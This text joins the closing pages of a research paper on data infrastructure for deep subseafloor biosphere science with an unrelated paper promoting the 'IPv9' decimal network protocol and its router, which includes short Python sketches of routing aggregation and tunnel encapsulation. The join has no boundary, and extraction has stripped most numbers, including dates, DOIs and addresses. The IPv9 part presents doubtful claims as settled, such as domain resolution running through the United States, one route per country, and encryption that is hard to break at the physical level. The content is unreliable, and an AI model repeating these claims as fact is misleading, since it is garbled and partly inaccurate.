subseafloor biosphere scientists in iodp negotiations. one way that c-debi increases the domain’s status is by making explicit the contribution of iodp/iodp resources to their research. 
the c-debi data portal, and the choices of metadata categories, provide evidence that deep subseafloor biosphere researchers can use to negotiate further involvement in iodp . a second way is to enable meta-analyses and cross-comparisons of methods that promote methodological standardization across the domain, with the goal of making microbiological workflows standard practice on future cruises. this standardization, in turn, is deemed necessary by many c-debi scientists to reconfigure how iodp cruises operate in the future, and thus to secure more data for their community. our case also demonstrates how relationships between single-domain and multi-domain infrastructure change over time. the infrastructure studied by (ribes & finholt, ), namely waters, fell apart even before it began its scientific operations. our study, on the other hand, exposes how the configuration of c-debi, and the priorities of those building c-debi infrastructure, has shifted. in the early years of c-debi, distributing grants to enable data production and to recruit more scientists into the community was very much the priority. over time, c-debi’s priorities changed, following from experiences in negotiating with other domains for resources during the three biosphere-focused iodp expeditions in and . biosphere scientists realized both that standardizing microbiological workflows and making explicit how they are using cores to produce data are critical challenges for acquiring more data from future drilling cruises. in turn, this awareness promoted a greater focus of c-debi on building and configuring online data management infrastructure. single-domain infrastructure is subject to change and reconfiguration as domain scientists gain more experience of, and become increasingly sophisticated operators in, using shared infrastructure. in turn, these shifts will change the configurations of resources available to scientists as they seek to go about their day-to-day work. conclusions scientists in many fields are concerned with increasing access to data as a means to advance their scientific work, to increase access to resources, and to enhance their status in the larger scientific community. many scientific domains have addressed these concerns through infrastructural strategies. very often, these strategies involve sharing infrastructure with other domains, whether this infrastructure is built anew, such as in the case of the large darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. synoptic survey telescope, or is gained by membership in other infrastructures, as in the case of the deep subseafloor biosphere and iodp/iodp . even when funding and data seem abundant, as in lsst, resources may be scarce and must be contested between domains. in many cases, scientific domains will participate in shared infrastructure and in domain- specific infrastructure. in this article, we explored how the deep subseafloor biosphere community pursued an infrastructural approach to addressing data scarcity. their data scarcity can be understood as a response to the challenges they face as an emergent domain in demonstrating their ability to contribute credibly to issues of critical social importance and interest. both independent and shared infrastructures proved essential to this community’s creation and maturation. further, we identified the mutual shaping of these shared and independent infrastructures. 
the independent infrastructure was built both in response to, and as an intervention in, the configuration of the shared infrastructure. we continue to study infrastructure, data management, and standards processes in the deep subseafloor biosphere research community—in particular as infrastructure continues to evolve in light of c-debi’s successful renewal in —and in astronomy to advance our understanding of relationships between infrastructure and epistemological practices (borgman et al., ). in this article, we focus on the relationships between shared and domain-specific infrastructures and the difficulties of sharing infrastructures. the deep subseafloor biosphere community continues to evolve. current pressures to standardize methods reveal the significant challenges in ensuring that this community can act as a single, strong, and united entity in negotiating access to shared infrastructure (darch, ). relationships between shared and domain-specific infrastructures should be studied across a wider range of scientific endeavors, as points of friction often reveal deeper truths about scientific practice (borgman et al., ; edwards et al., ). acknowledgements this article is based in part on a paper presented at association for information science and technology (asis&t) annual meeting , ship space to database: motivations to manage research data for the deep subseafloor biosphere (darch & borgman, ). we acknowledge the contributions of milena golshan, irene pasquetto, ashley e. sands, sharon traweek, and jillian wallis for commenting on earlier drafts of this paper, and to rebekah cummings for assistance with conducting the case study. we are deeply grateful to those c-debi and iodp/iodp personnel who we interviewed and observed at work. additional information and declarations funding research reported here has been supported by two grants from the sloan foundation award: # (the transformation of knowledge, culture and practice in data- driven science: a knowledge infrastructures perspective, christine l. borgman, pi, sharon traweek, co-pi, ucla); and # (if data sharing is the answer, what is the question?, christine l. borgman, ucla, subcontract to peter t. darch, university of darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. il at urbana-champaign). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: sloan foundation award: # , # . competing interests christine l. borgman is on the academic advisory board for peerj computer science. author contributions • peter t. darch conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • christine l. borgman conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ucla north general institutional review board irb# - -cr- . data availability the following information was supplied regarding data availability: the data in this article is human subjects data, and cannot be released given their sensitive nature and the infeasibility of de-identification. references aronova e, baker ks, oreskes n. . 
big science and big data in biology: from the international geophysical year through the international biological program to the long term ecological research (lter) network, –present. historical studies in the natural science ( ): – doi . /hsns. . . . . baker ks, jackson sj, wanetick jr. . strategies supporting heterogeneous data and interdisciplinary collaboration: towards an ocean informatics environment. in: proceedings of the th annual hawaii international conference on system sciences, . hicss ’ . b– b. beaulieu a. . research note: from co-location to co-presence: shifts in the use of ethnography for the study of knowledge. social studies of science ( ): – doi . / . benson da, cavanaugh m, clark k, karsch-mizrachi i, lipman dj, ostell j, say- ers ew. . genbank. nucleic acids research (database issue):d –d doi . /nar/gks . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /hsns. . . . http://dx.doi.org/ . / http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /peerj-cs. benson e. . one infrastructure, many global visions: the commercialization and diversification of argos, a satellite-based environmental surveillance system. social studies of science ( ): – doi . / . bietz mj, lee cp. . collaboration in metagenomics: sequence databases and the organization of scientific work. in: wagner i, tellioğlu h, balka e, simon c, ciolfi l, eds. ecscw . london: springer, – . borgman cl. . big data, little data, no data: scholarship in the networked world. cambridge: the mit press. borgman cl, darch pt, sands ae, pasquetto iv, golshan ms, wallis jc, traweek s. . knowledge infrastructures in science: data, diversity, and digital libraries. international journal on digital librariex ( – ): – doi . /s - - -z. borgman cl, wallis jc, enyedy n. . little science confronts the data deluge: habitat ecology, embedded sensor networks, and digital libraries. international journal on digital libraries ( – ): – doi . /s - - - . borgman cl, wallis jc, mayernik ms, pepe a. . drowning in data: digital library architecture to support scientific use of embedded sensor networks. in: joint conference on digital libraries. vancouver: association for computing machinery, – . bowker gc. . biodiversity datadiversity. social studies of science ( ): – doi . / . bowker gc. . memory practices in the sciences. cambridge: mit press. bowler pj, morus ir. . making modern science: a historical survey. chicago: university of chicago press. c-more. a. center for microbial oceanography research and education. available at http://cmore.soest.hawaii.edu (accessed on july ). c-more. b. c-more / data. available at http://cmore.soest.hawaii.edu/datasearch/ data.php (accessed on july ). ceccarelli l. . shaping science with rhetoric: the cases of dobzhansky, schrodinger, and wilson. chicago: university of chicago press. center for dark energy biosphere investigations. . c-debi strategic implemen- tation plan, – . available at http:// . . . /internal/docs/c-debi_sip_ sep.pdf. center for dark energy biosphere investigations. . center for dark energy biosphere investigations stc annual report . available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_ noapp.pdf. center for dark energy biosphere investigations. a. c-debi data management philosophy and policy. available at http://www.darkenergybiosphere.org/internal/ docs/c-debidatamanagementplan_ draft.pdf. center for dark energy biosphere investigations. b. c-debi ‘‘activity’’ theme team workshop—report. 
available at http://www.darkenergybiosphere.org/wp- content/uploads/docs/ c-debiactivity_workshopreport.pdf. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://cmore.soest.hawaii.edu http://cmore.soest.hawaii.edu/datasearch/data.php http://cmore.soest.hawaii.edu/datasearch/data.php http:// . . . /internal/docs/c-debi_sip_ sep.pdf http:// . . . /internal/docs/c-debi_sip_ sep.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debi_annualreport_noapp.pdf http://www.darkenergybiosphere.org/internal/docs/c-debidatamanagementplan_ draft.pdf http://www.darkenergybiosphere.org/internal/docs/c-debidatamanagementplan_ draft.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debiactivity_workshopreport.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ c-debiactivity_workshopreport.pdf http://dx.doi.org/ . /peerj-cs. center for dark energy biosphere investigations. a. c-debi strategic implemen- tation plan – . available at http:// . . . /internal/docs/c-debi_sip_ - .pdf. center for dark energy biosphere investigations. b. c-debi ‘‘activity’’ theme team workshop—report. bigelow laboratory for ocean sciences & ocean point inn, east boothbay. me: c-debi. available at http://www.darkenergybiosphere.org/ wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf. center for dark energy biosphere investigations. a. cdp. available at http://cdp. darkenergybiosphere.org. center for dark energy biosphere investigations. b. center for dark energy biosphere investigations stc annual report . available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf. center for dark energy biosphere investigations. . c-debi-funded projects. available at http://www.darkenergybiosphere.org/research-activities/funded-projects/ (accessed on july ). chow-white pa, garcía-sancho m. . bidirectional shaping and spaces of conver- gence interactions between biology and computing from the first dna sequencers to global genome databases. science, technology & human values ( ): – doi . / . cmop. . center for coastal margin observation & prediction. available at http: //www.stccmop.org (accessed on july ). committee on the review of the scientific accomplishments and assessment of the potential for future transformative discoveries with us-supported scientific ocean drilling. . scientific ocean drilling: accomplishments and challenges. washington, d.c.: national academies press. cresis. . center for remote sensing of ice sheets. available at http://www.cresis.ku. edu (accessed on july ). darch pt. . many methods, many microbes: methodological diversity and standard- ization in the deep subseafloor biosphere. in: iconference proceedings. available at https://www.ideals.illinois.edu/handle/ / . darch pt, borgman cl. . ship space to database: motivations to manage research data for the deep subseafloor biosphere. in: proceedings of the th annual meeting of the association for information science and technology. seattle. available at http: //www.asis.org/asist /proceedings/submissions/papers/ paper.pdf . darch pt, borgman cl, traweek s, cummings rl, wallis jc, sands ae. . what lies beneath? 
knowledge infrastructures in the subseafloor biosphere and beyond. in- ternational journal on digital librarie ( ): – doi . /s - - - . darch pt, sands ae. . beyond big or little science: understanding data lifecycles in astronomy and the deep subseafloor biosphere. in: iconference proceedings. newport beach, ca: ischools, available at https://www.ideals.illinois.edu/handle/ / . dark energy survey. . dark energy survey. available at https://www.darkenergysurvey. org/ (accessed on july ). darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http:// . . . /internal/docs/c-debi_sip_ - .pdf http:// . . . /internal/docs/c-debi_sip_ - .pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf http://cdp.darkenergybiosphere.org http://cdp.darkenergybiosphere.org http://www.darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf http://www.darkenergybiosphere.org/research-activities/funded-projects/ http://dx.doi.org/ . / http://www.stccmop.org http://www.stccmop.org http://www.cresis.ku.edu http://www.cresis.ku.edu https://www.ideals.illinois.edu/handle/ / http://www.asis.org/asist /proceedings/submissions/papers/ paper.pdf http://www.asis.org/asist /proceedings/submissions/papers/ paper.pdf http://dx.doi.org/ . /s - - - https://www.ideals.illinois.edu/handle/ / https://www.ideals.illinois.edu/handle/ / https://www.darkenergysurvey.org/ https://www.darkenergysurvey.org/ http://dx.doi.org/ . /peerj-cs. earthscope. . earthscope. available at http://www.earthscope.org/ (accessed on july ). edwards k. . center for dark energy biosphere investigations (c-debi ): a center for resolving the extent, function, dynamics and implications of the subseafloor biosphere. available at http://www.darkenergybiosphere.org/internal/docs/ c- debi _fullproposal.pdf. edwards pn. . a vast machine: computer models, climate data, and the politics of global warming. cambridge: mit press. edwards k, amend j. . towards coordination and integration of deep marine biosphere research: the dark energy biosphere institute (debi). available at https: //www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf. edwards pn, bowker gc, jackson sj, williams r. . introduction: an agenda for in- frastructure studies. journal of the association for information systems ( ): – . edwards pn, jackson sj, chalmers mk, bowker gc, borgman cl, ribes d, burton m, calvert s. . knowledge infrastructures: intellectual frameworks and research challenges. ann arbor: university of michigan, . edwards pn, mayernik ms, batcheller al, bowker gc, borgman cl. . science friction: data, metadata, and collaboration. social studies of science ( ): – doi . / . european space agency. . gaia. available at http://sci.esa.int/gaia/ (accessed on july ). hagen j. . the statistical frame of mind in systematic biology from quanti- tative zoology to biometry. journal of the history of biology ( ): – doi . /a: . hammersley m, atkinson p. . ethnography: principles in practice. rd edition (reprinted). london: routledge. hey ajg, trefethen a. . the data deluge: an e-science perspective. in: berman f, fox g, hey ajg, eds. grid computing: making the global infrastructure a reality. west sussex: wiley, – . integrated ocean drilling program (iodp) planning sub committee (ipsc) scientific planning working group. 
. earth, oceans and life: iodp initial science plan. washington, d.c.: international working group support office. iodp. . international ocean discovery program. available at http://iodp.org (accessed on june ). jackson sj, buyuktur a. . who killed waters? mess, method, and forensic explana- tion in the making and unmaking of large-scale science networks. science, technology & human value ( ): – doi . / . kay le. . who wrote the book of life? a history of the genetic code. stanford: stanford university press. keller ef. . a feeling for the organism, th aniversary edition: the life and work of barbara mcclintock. london: macmillan. kelty cm. . this is not an article: model organism newsletters and the question of open science. biosocieties ( ): – doi . /biosoc. . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.earthscope.org/ http://www.darkenergybiosphere.org/internal/docs/ c-debi _fullproposal.pdf http://www.darkenergybiosphere.org/internal/docs/ c-debi _fullproposal.pdf https://www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf https://www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf http://dx.doi.org/ . / http://sci.esa.int/gaia/ http://dx.doi.org/ . /a: http://iodp.org http://dx.doi.org/ . / http://dx.doi.org/ . /biosoc. http://dx.doi.org/ . /peerj-cs. kitchin r. . big data, new epistemologies and paradigm shifts. big data & society ( ): doi . / . kitchin r, lauriault tp. . small data, data infrastructures and big data. ssrn electronic journal doi . /ssrn. . kragh h. . cosmology and controversy: the historical development of two theories of the universe. princeton: princeton university press. lenoir t. . shaping biomedicine as an information science. in: mary eb, trudi bh, robert vw, eds. proceedings of the conference on the history and heritage of science information systems. medford: information today, inc, – . lenoir t, hays m. . manhattan project for biomedicine. in: controlling our destinies: historical, philosophical, ethical, and theological perspectives on the human genome project. south bend indiana: university of notre dame press, – . leonelli s. . documenting the emergence of bio-ontologies: or, why research- ing bioinformatics requires hpssb. history and philosophy of the life sciences ( ): – . leonelli s. . when humans are the exception: cross-species databases at the interface of biological and clinical research. social studies of science ( ): – doi . / . leonelli s. . what difference does quantity make? on the epistemology of big data in biology. big data & society ( ): doi . / . leonelli s, ankeny ra. . re-thinking organisms: the impact of databases on model organism biology. studies in history and philosophy of science part c: studies in history and philosophy of biological and biomedical sciences ( ): – doi . /j.shpsc. . . . 
lsst science collaboration, abell pa, allison j, anderson sf, andrew jr, angel jrp, armus l, arnett d, asztalos sj, axelrod ts, bailey s, ballantyne dr, bankert jr, barkhouse wa, barr jd, barrientos lf, barth aj, bartlett jg, becker ac, becla j, beers tc, bernstein jp, biswas r, blanton mr, bloom js, bochanski jj, boeshaar p, borne kd, bradac m, brandt wn, bridge cr, brown me, brunner rj, bullock js, burgasser aj, burge jh, burke dl, cargile pa, chandrasekharan s, chartas g, chesley sr, chu y-h, cinabro d, claire mw, claver cf, clowe d, connolly aj, cook kh, cooke j, cooray a, covey kr, culliton cs, de jong r, de vries wh, debattista vp, delgado f, dell’antonio ip, dhital s, di stefano r, dickinson m, dilday b, djorgovski sg, dobler g, donalek c, dubois-felsmann g, durech j, eliasdottir a, eracleous m, eyer l, falco ee, fan x, fassnacht cd, ferguson hc, fernandez yr, fields bd, finkbeiner d, figueroa ee, fox db, francke h, frank js, frieman j, fromenteau s, furqan m, galaz g, gal-yam a, garnavich p, gawiser e, geary j, gee p, gibson rr, gilmore k, grace ea, green rf, gressler wj, grillmair cj, habib s, haggerty js, hamuy m, harris aw, hawley sl, heavens af, hebb l, henry tj, hileman e, hilton ej, hoadley k, holberg jb, holman mj, howell sb, infante l, ivezic z, jacoby sh, jain b, jedicke r, jee mj, jernigan jg, jha sw, johnston kv, jones rl, juric m, kaasalainen m, darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /ssrn. http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.shpsc. . . http://dx.doi.org/ . /peerj-cs. kafka ss, kahn sm, kaib na, kalirai j, kantor j, kasliwal mm, keeton cr, kessler r, knezevic z, kowalski a, krabbendam vl, krughoff ks, kulkarni s, kuhlman s, lacy m, lepine s, liang m, lien a, lira p, long ks, lorenz s, lotz jm, lupton rh, lutz j, macri lm, mahabal aa, mandelbaum r, marshall p, may m, mcgehee pm, meadows bt, meert a, milani a, miller cj, miller m, mills d, minniti d, monet d, mukadam as, nakar e, neill dr, newman ja, nikolaev s, nordby m, o’connor p, oguri m, oliver j, olivier ss, olsen jk, olsen k, olszewski ew, oluseyi h, padilla nd, parker a, pepper j, peterson jr, petry c, pinto pa, pizagno jl, popescu b, prsa a, radcka v, raddick mj, rasmussen a, rau a, rho j, rhoads je, richards gt, ridgway st, robertson be, roskar r, saha a, sarajedini a, scannapieco e, schalk t, schindler r, schmidt s, schmidt s, schneider dp, zhan h, et al. . lsst science book, version . . arxiv preprint. arxiv: . . meyer et. . moving from small science to big science: social and organizational impediments to large scale data sharing (ssrn scholarly paper no. id ). rochester: social science research network. mukerji c. . a fragile power: scientists and the state. princeton: princeton university press. national science foundation. . nsf data management plans. washington, d.c.: national science foundation. noaa. . national oceanic and atmospheric administration. available at http: //www.noaa.gov (accessed on july ). o’donoghue t, punch k (eds.) . qualitative educational research in action: doing and reflecting. abingdon: routledgefalmer. orcutt bn, larowe de, biddle jf, colwell fs, glazer bt, reese bk, kirkpatrick jb, lapham ll, mills hj, sylvan jb, wankel sd, wheat cg. . microbial activity in the marine deep biosphere: progress and prospects. frontiers in microbiology : article doi . /fmicb. . . ortega c. . argos capabilities for global ocean monitoring. 
in: dahlin h, flem- ming nc, nittis k, petersson se, eds. building the european capacity in operational oceanography: proceedings of the third international conference on eurogoos. amsterdam: elsevier, – . paul nw. . rationalitäten der wissenproduktion: Über transformatio- nen von gegenständen, technologien und information in biomedizin und lebenswissenschaften. berichte zur wissenschaftsgeschichte ( ): – doi . /bewi. . porter tm. . trust in numbers: the pursuit of objectivity in science and public life. princeton: princeton university press. ribes d. . ethnography of scaling, or, how to a fit a national research infrastructure in the room. in: proceedings of the th acm conference on computer supported cooperative work & social computing. new york: acm, – . available at http: //dl.acm.org/citation.cfm?id= . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://www.noaa.gov http://www.noaa.gov http://dx.doi.org/ . /fmicb. . http://dx.doi.org/ . /bewi. http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dx.doi.org/ . /peerj-cs. ribes d, bowker gc. . organizing for multidisciplinary collaboration: the case of the geosciences network. in: olson gm, zimmerman as, bos n, eds. science on the internet. cambridge: mit press, – . ribes d, finholt ta. . representing community: knowing users in the face of changing constituencies. in: proceedings of the acm conference on computer supported cooperative work. new york: acm, – . ribes d, polk jb. . organizing for ontological change: the kernel of an aids research infrastructure. social studies of science ( ): – doi . / . sawyer s. . data wealth, data poverty, science and cyberinfrastructure. prometheus ( ): – doi . / . sloan digital sky survey: home. . available at http://www.sdss.org/ (accessed on november ). southern california earthquake center. . southern california earthquake center |studying earthquakes and their effects in california and beyond. available at https://www.scec.org/ (accessed on july ). star sl. . the ethnography of infrastructure. american behavioral scientist ( ): – doi . / . star sl, ruhleder k. . steps toward an ecology of infrastructure: design and access for large information spaces. information systems research ( ): – doi . /isre. . . . strauss ma. . mapping the universe: surveys of the sky as discovery engines in astronomy. daedalus ( ): – doi . /daed_a_ . suárez-díaz e, anaya-munoz vh. . history, objectivity, and the construction of molecular phylogenies. studies in history and philosophy of science part c: studies in history and philosophy of biological and biomedical science ( ): – . teske a, biddle jf, schrenk m. . workshop: deep biosphere sediment microbiol- ogy. available at http://www.darkenergybiosphere.org/rcn/meetings/ meeting/ docs/ debi_sedi mentmeetingsummary .pdf . unols. . university-national oceanographic laboratory services. available at https://www.unols.org/ (accessed on july ). whitman wb, coleman dc, wiebe wj. . prokaryotes: the unseen majority. proceedings of the national academy of sciences of the united states of america ( ): . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . / http://www.sdss.org/ https://www.scec.org/ http://dx.doi.org/ . / http://dx.doi.org/ . /isre. . . http://dx.doi.org/ . 
International Journal of Advanced Network, Monitoring and Controls, Volume , No. , DOI: . /ijanmc- -

Research and Implementation of Future Network Router

Sun Huai — 1. School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China; 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control, Xi'an, China; e-mail: sh @ .com
Wang Zhongsheng — 1. School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China; 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control, Xi'an, China; e-mail: wzhsh @ .com

Abstract—This paper summarizes the development and characteristics of IPv9 and introduces its digital domain name system, route management and security. The tunneling and dual protocol stack technologies are described. Transitions from the existing IP protocols (IPv4/IPv6) to IPv9 will be based on mature network conversion services that support protocol compatibility. The IPv9 router is currently available in two models, megabit and gigabit, and both are well able to meet the network needs of IPv9. The film transmission system of Beijing University of Posts and Telecommunications uses IPv9 and G technology and is at present a relatively advanced transmission application of IPv9. The paper summarizes the convenience and security brought by the new network address and provides a new idea for the development of the network.

Keywords—future network; router; network transformation

I. The new network IPv9

The Internet Protocol (IP) is a communication protocol designed for computers to communicate with each other in a network; it provides the common rules by which computers access the Internet, which has become the largest open network in the world. With the rapid development of the global economy, advances in communication and network technology, and ever higher penetration of computers and mobile terminals, the problems of IPv4 have been exposed: its limited address space, performance, network security and routing bottlenecks make it difficult to meet the future needs of the Internet. To solve IPv4's many problems, IPv6, IPv9 and other Internet protocols have been proposed.

A. The production of IPv9

The new network covers three new technologies: address coding design, a new addressing mechanism, and a new address architecture design [ ]. It aims to build a core technology system based on the underlying IP network, on which a new framework can be formed that connects to and is compatible with the network systems covering the existing networks (the Internet built on IPv4 and IPv6 technologies). Because the underlying invention has been confirmed in law by an authoritative United States professional and technical body, China holds prior art and proprietary core technology for an IP framework alongside the United States Internet, and with it core network sovereignty. This is the patented technology of IPv9 ("Method of using whole digital code to assign address for computer"); the official patent name is "A method of allocating addresses to computers using full digital coding".
The IPv9 protocol takes the 0–9 Arabic-digit network as the virtual IP address and uses decimal as its text representation, which is a convenient way to find online users [ ]. To improve efficiency and convenience for end users, some of the addresses can be used directly as domain names. IPv9 is also called the "new generation security and reliable information integrated network protocol". It builds on the classification and coding of the original computer network, the cable radio and television network, and the telecommunication network.

B. The characteristics of IPv9

By using IPv9 routers, clients, protocol conversion routers and other devices, a pure IPv9 network and hybrid networks with the existing IP protocols can be built, achieving a new generation of Internet systems with independent and secure intellectual property rights. This includes a domestically controllable IPv9 future-network root domain name system; it promotes the convergence of technology, services and data, and enables cross-level, cross-regional, cross-system, cross-department and cross-business collaborative management and services. Taking data concentration and sharing as the path, a nationally integrated big data center can be built, domestically controlled and independently controllable alternative plans can be accelerated, and a safe and controllable information technology system can be established.

In the existing TCP/IP protocol suite, conventional packet switching cannot support truly real-time applications, nor can it support circuit switching or applications such as transmitting sound or images over circuits within the four-layer protocol model. With the demand for voice, image and data triple play, the incompatibility of human-machine interfaces, the environmental-protection requirements placed on redundant links, and especially the unreasonable design of the original security mechanism, it became imperative to establish a new theoretical foundation for the network. China therefore established the Decimal Network Standard Working Group to study and implement security-oriented authenticate-before-communicate rules, address encryption, an address space whose length ranges from very short to very long addresses, resource reservation, a virtual real-circuit transmission mode for the communication network, character-based direct addressing, and a hybrid three-layer/four-layer network architecture.

The existing TCP/IP protocol is an unreliable packet protocol with a maximum packet length of 65,535 bytes. The TCP/IP/M protocol of IPv9, led by China, not only inherits the unreliable packet service of the existing TCP/IP protocol but also develops an absolute code stream and a long stream code [ ], so that a data packet can reach tens of megabytes or more. Once a data link has been established directly over telephone or cable-television lines, such streams can be transmitted without affecting the existing transmission network, following a new transmission model in which the conventional layer-three and layer-four transport protocols can ultimately be dispensed with.
1) Digital domain name system: In the digital domain name system, IPv4 and IPv6 perform domain name resolution through the United States, whereas under IPv9 each country sets its own, which avoids the limitation of IP addresses and reduces a state's dependence on externally controlled domain names [ ]. IPv9 is a "decimal network" with independent intellectual property rights, developed according to the invention patent "A method of allocating addresses for computers using all-digital encoding". Its decimal network introduces a digital domain name system through which the original binary address is converted into decimal text, allowing the computers on the network to connect to one another, communicate and transmit data, while remaining compatible with Chinese and English domain names. The digital domain name technology used by the IPv9 decimal network reduces the difficulty of network management, and its vast address space and newly added security mechanisms solve many problems faced by the existing IPv4; its advantages in other respects can also meet different levels of future demand from a wide variety of devices.

2) Routing: In terms of routing, the growth of the Internet has caused the IPv4 routing table to swell, so the efficiency of network routing keeps declining. IPv9 addresses this problem, and its optimized routing improves the efficiency of the network. IPv9 establishes an IPv9 tunnel between a mobile unit and its proxy; the "proxy" acting for the mobile unit relays packets addressed to the unit's home address through the tunnel to the unit's current location, thereby supporting terminal mobility. IPv9 also has a smaller routing table than IPv4: IPv9 addresses are assigned according to a clustering principle, which lets a router represent a whole block of networks with a single table entry, reducing the length of the routing table and increasing the speed of packet forwarding (a small code sketch of this aggregation idea follows at the end of this section). Because address allocation in IPv9 follows spatial clustering, an IPv9 router can represent a national network or an application network with one record, greatly reducing routing table length and improving lookup speed; such a network can also express a specific geographical location [ ]. Following this logic, only one route is needed between countries; for example, the route to China is a single entry. The IPv4 routing table, by contrast, is large and irregular, and although the IPv6 routing table is smaller than the IPv4 one, it contains no geographic information and its routes remain disordered.

3) Security: IPv9's encryption and authentication technologies are significantly improved over IPv4, and the encryption proposed for IPv9 is difficult to decipher at the physical level, so confidentiality is markedly better. At the level of network information security, however, many factors still make network information in China insecure. The fundamental reason is that the root servers of IPv4 and IPv6 are in the United States and many network-related patents are held there, which can also introduce the risk of information exposure. Because IPv9 is an Internet protocol with independent intellectual property rights, it can bring considerable protection to national information security [ ]. IPv9's address space enables end-to-end secure transmission, making it possible to assign addresses directly to devices. Neither IPv4 nor IPv6 has a concept of national geographic location, and most of their domain name resolution servers are in the United States, whereas IPv9 proposes the concept of "sovereign equality", enabling each country to have its own root domain name system.
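The routing argument above — one aggregated record standing in for what would otherwise be many table entries — is essentially prefix aggregation with longest-prefix matching. The short sketch below illustrates the idea with Python's standard ipaddress module; the prefix is an ordinary IPv4 prefix chosen purely for illustration, since no public library implements IPv9 addressing.

    import ipaddress

    # Hypothetical example: one block assigned hierarchically to a single
    # country/application network collapses to a single routing-table entry.
    aggregate = ipaddress.ip_network("203.0.112.0/20")      # one entry

    # Without aggregation the same address space might appear as many entries.
    flat_entries = list(aggregate.subnets(new_prefix=24))   # 16 separate /24s

    print("entries with aggregation   :", 1)
    print("entries without aggregation:", len(flat_entries))

    # Longest-prefix matching against the single aggregate still covers every
    # destination inside the block.
    dst = ipaddress.ip_address("203.0.118.77")
    print(dst in aggregate)   # True -> forwarded by the one aggregate route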
II. Introduction to network access technology

IPv9 has a huge IP address resource space, which not only completely resolves the current shortage of IPv4 address resources but is also far superior to the IPv6 network in the number of IP addresses it can use. Because the currently deployed IPv4 protocol operates at such a large scale, no new protocol can fully replace it in a short period of time; replacement must be a gradual, iterative process, so a transition mechanism has to be considered. To complete the process of a new IP protocol replacing IPv4, the first consideration is the relationship between the existing IPv4 network and the future network. The problem to be solved is how to achieve a smooth transition so that the IP address shortage can be relieved quickly. Solving the transition-mechanism problem will in fact promote the application of IPv9, and it is decisive for whether IPv9 becomes a next-generation Internet protocol or remains merely a LAN protocol.

A. Tunnel technology

Tunneling converts a datagram of the new protocol into a datagram in IPv4 format so that it can be carried across the routing system of the existing IPv4 network. A tunnel has exactly one entrance and one exit. At the tunnel entrance, the original datagram is parsed and encapsulated as the payload of an IPv4-format datagram. The processed datagram is then transmitted along the virtual link identified by the tunnel. When it arrives at the tunnel exit, it is handed to the IPv4 protocol stack there, which examines the protocol (next header) field; if the field carries the tunnel protocol value, the outer IPv4 header is discarded, the datagram is decapsulated to recover the original inner message and its destination address, and the packet is then forwarded to that destination, processed from that point on by the inner protocol. During the transition, tunneling thus enables nodes of the new protocol to communicate by using the existing IPv4 networks. The figure illustrates the encapsulation.

Figure: Schematic diagram of datagram encapsulation in the tunnel — at the entrance the original header and payload are packed inside an outer IPv4 header; at the exit the outer header is removed and the original datagram is recovered.
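The encapsulate/decapsulate cycle in the figure can be made concrete in a few lines. The sketch below wraps an arbitrary inner datagram in a minimal 20-byte outer IPv4 header, in the style of classic 6in4 tunneling (IP protocol number 41); this is an illustrative assumption rather than the paper's implementation, the checksum is left unset, and the inner bytes merely stand in for whatever new-protocol datagram a tunnel would carry.

    import struct

    def encapsulate(inner_packet: bytes, src: bytes, dst: bytes, proto: int = 41) -> bytes:
        """Wrap inner_packet in a minimal 20-byte IPv4 header (no options).

        proto=41 is the registered value for IPv6-in-IPv4 encapsulation; a
        private tunnel could use another value.  src/dst are the 4-byte tunnel
        entrance and exit addresses.
        """
        total_len = 20 + len(inner_packet)
        header = struct.pack(
            "!BBHHHBBH4s4s",
            (4 << 4) | 5,   # version=4, header length=5 words
            0,              # DSCP/ECN
            total_len,      # total length
            0, 0,           # identification, flags/fragment offset
            64,             # TTL
            proto,          # protocol field: what the inner packet is
            0,              # header checksum (left 0 in this sketch)
            src, dst,       # tunnel entrance and exit addresses
        )
        return header + inner_packet

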